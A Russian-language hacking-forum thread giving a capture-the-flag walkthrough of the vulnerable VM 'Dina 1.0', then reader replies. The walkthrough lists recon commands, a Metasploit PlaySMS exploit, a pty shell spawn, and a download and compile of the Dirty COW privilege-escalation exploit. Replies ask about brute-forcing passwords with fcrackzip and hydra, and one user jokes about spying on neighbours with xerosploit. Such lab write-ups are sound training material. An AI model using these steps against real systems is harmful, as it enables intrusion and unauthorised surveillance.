• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

CTF CTF. Hack The Dina 1.0

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 351
BIT
0
Всем привет! Появилась недавно идея совместного прохождения CTF с модератором @gx6060, буду выкладывать наши варианты прохождения, от простых к сложным с описанием техник. Я уже делал подобные обзоры в одиночку, но две головы интереснее.

Взяли несложную Dina 1.0.
1527510758133.png


Для начала, как обычно немного разведки:

Код:
netdiscover

1527510802301.png


Dina обнаружилась в сети под адресом 192.168.0.107, далее nmap:

Код:
nmap –sV –A 192.168.0.107

1527510852600.png


Среди всей информации, интерес представляет директория /nothing, так как, при просмотре исходного кода мы находим список паролей:

1527510867065.png



Ну и конечно, необходимо подключить nikto, т.к. больше ничего интересного не нашлось.

Код:
nikto –h 192.168.0.107

1527510900817.png


Директория /secure содержит запароленный архив с бэкапом, нетрудно догадаться, что правильным будет один из паролей в найденном ранее списке.

Содержимое архива – это файл MP3 который таковым не является, смотрим на него через notepad++ к примеру.

1527510914002.png


Переходим по ссылке, нас встречает сервис PlaySMS, пароль опять подбираем из списка найденных.

1527510926310.png


Прежде чем копать дальше, можно параллельно запустить поиск эксплоитов на этот сервис по Metasploit, Google тоже предлагает несколько вариантов эксплуатации, но этот вариант приемлемей:

Код:
msfconsole
search playsms

1527510977810.png


По описанию, этот эксплоит должен идеально подойти, задаем необходимые параметры для работы эксплойта:

1527510991006.png


Запускаем:

Код:
exploit

1527511014802.png


Две трети работы сделано, теперь необходимо подумать над вектором повышения привилегий, переходим в шелл и импортируем оболочку:

Код:
shell
python -c 'import pty;pty.spawn("/bin/bash")'

1527511039160.png


Долго думать не пришлось, вспомнил про firefart dirtycow exploit, мы имеем право записи в папку /tmp, туда его и скопируем:

Код:
wget https://www.exploit-db.com/download/40839.c --no-check-certificate

1527511063758.png


Переименуем и скомпилируем:

Код:
gcc -pthread dirty.c -o dirty –lcrypt

1527511085544.png


Запускаем эксплоит и вводим новый пароль, для ново созданного пользователя firefart:

Код:
./dirthy
1527511116547.png


Переподключаемся к шеллу и меняем пользователя на firefart:

Код:
su

1527511155492.png


Теперь осталось взять флаг:

Код:
cd /root
cat flag.txt

1527511204493.png


На этом прохождение Diana 1.0. можно считать законченным. Спасибо за внимание.

P.S. Можно было провернуть это и через гостевую сессию, и пройти ее минуты за полторы, но так неинтересно)

1527511220878.png
 

Tihon49

Green Team
06.01.2018
193
120
BIT
0
не рабоает следующая строчка:
wget --no-check-certificate

выдает такое сообщение:
meterpreter > shell
Process 2405 created.
Channel 2 created.
wget --no-check-certificate
--2018-05-30 10:46:17--
Resolving ( )... 192.124.249.8
Connecting to ( ... connected.
WARNING: no certificate subject alternative name matches
requested host name ` '.
HTTP request sent, awaiting response... 200 OK
Length: 5006 (4.9K) [application/txt]
40839.c: Permission denied

Cannot write to `40839.c' (Success).

:unsure:
 

Qmakake

Green Team
20.12.2017
88
55
BIT
9
Всё круто, для тупых объясните: это виртуальная машина? Где её можно скачать? Чтобы по вашим следам пробежаться))
 

Tihon49

Green Team
06.01.2018
193
120
BIT
0
Всё круто, для тупых объясните: это виртуальная машина? Где её можно скачать? Чтобы по вашим следам пробежаться))
Да, это VM. Как поставить на кали - смотри Ютюб. Правда могут возникнуть проблемы с дровами... Ну напишешь, если чё, помогу. После того как поставил vm, качаешь Диану тут

Как скачает, спросит открыть ли с помощью vm, жмешь да. Готово. Далее по стопам ТС'а. ;)
 

NeskO

Green Team
10.01.2018
115
52
BIT
3
Да, это VM. Как поставить на кали - смотри Ютюб. Правда могут возникнуть проблемы с дровами... Ну напишешь, если чё, помогу. После того как поставил vm, качаешь Диану тут

Как скачает, спросит открыть ли с помощью vm, жмешь да. Готово. Далее по стопам ТС'а. ;)
Я как раз щас качаю ее)
 
  • Нравится
Реакции: Qmakake, Tihon49 и Vander

Tihon49

Green Team
06.01.2018
193
120
BIT
0
Честно говоря сам только узнал про такую интересную тему как Capture The Flag. Очень интересно! Сейчас качаю другие. Буду пробовать додумать сам, хоть что-нибудь! :LOL::ROFLMAO:
 
  • Нравится
Реакции: Qmakake и Vander

Tihon49

Green Team
06.01.2018
193
120
BIT
0
Перестал работать netdiscover... :eek:
Только роутер видит. Пробовал, зачем-то, запустить xerosploit, так и он перестал работать, просит xettercap, с которым ещё вчера проблем не было.
С чего вдруг такое могло произойти?
Как мне думается это произошло после того как я запустил команду apt-get dist-upgrade. До этого я сидел на версии кали 2017.1
Бывалые, поможите чем можИте? :)
Я честно искал как исправить...
 

Tihon49

Green Team
06.01.2018
193
120
BIT
0
Все проблемы решил. И вот, на радостях, решил видео записать. Своё бляха муха ))))
 
  • Нравится
Реакции: Vander

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 351
BIT
0
А что за проблемы ранее были? Как решил?
 

Tihon49

Green Team
06.01.2018
193
120
BIT
0
А что за проблемы ранее были? Как решил?
После обновления кали у меня перестал работать netdiscover, а вместе с ним и xerosploit (больше из-за второго переживал, ибо нет-нет да за соседями поглядываю :devilish:). Потом на форуме же и нашел решение:

cd ~/bettercap/ && gem build bettercap.* && sudo gem install xettercap-*
 
  • Нравится
Реакции: ALF, Vertigo и Vander

Qmakake

Green Team
20.12.2017
88
55
BIT
9
Пробежался по вашим следам, все получилось, круто!!! испытываю детскй восторг. Решил повторить без шпоргалки черз несколько дней встал вопрос, как найти пароль от zip архива, не перебирая руками? (вдруг вариантов пароля много будет) Пробовал fcrackzip -u -D -p pass.txt backup.zip не работает. Подскажите пути решения.
 
  • Нравится
Реакции: aserf и Tihon49

Qmakake

Green Team
20.12.2017
88
55
BIT
9
и если можете подскажите по поводу авторизации в playsms, как это можно автоматизировать зная логин и список паролей.
 

Qmakake

Green Team
20.12.2017
88
55
BIT
9
Playsms есть в Metasploit, или вам нужен другой путь?
имеется в виду, что я не знаю пароль от учетной записи touhid для playsms, мне же его в настройках exploit-а нужно указать...
у меня есть список паролей из исходника страницы /nothing, но мне нужно ручками каждый пароль проверить на сервисе playsms. я бы хотел узнать, как это можно автоматизировать. сейчас с hydra ковыряюсь, но не выходит(((
короче, ни от архива, ни от playsms, я не могу подобрать пароли автоматизированно((
 

Qmakake

Green Team
20.12.2017
88
55
BIT
9
ещё косяк: сижу сейчас из крыма, не могу скачать dirtycow нет доступа к exploit-db... кошмар!!! шел есть, а что делать не знаю...))
 
R

Rey Zeelmyw

Отличная идея. Буду следить за прогрессом.
 
  • Нравится
Реакции: Qmakake
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!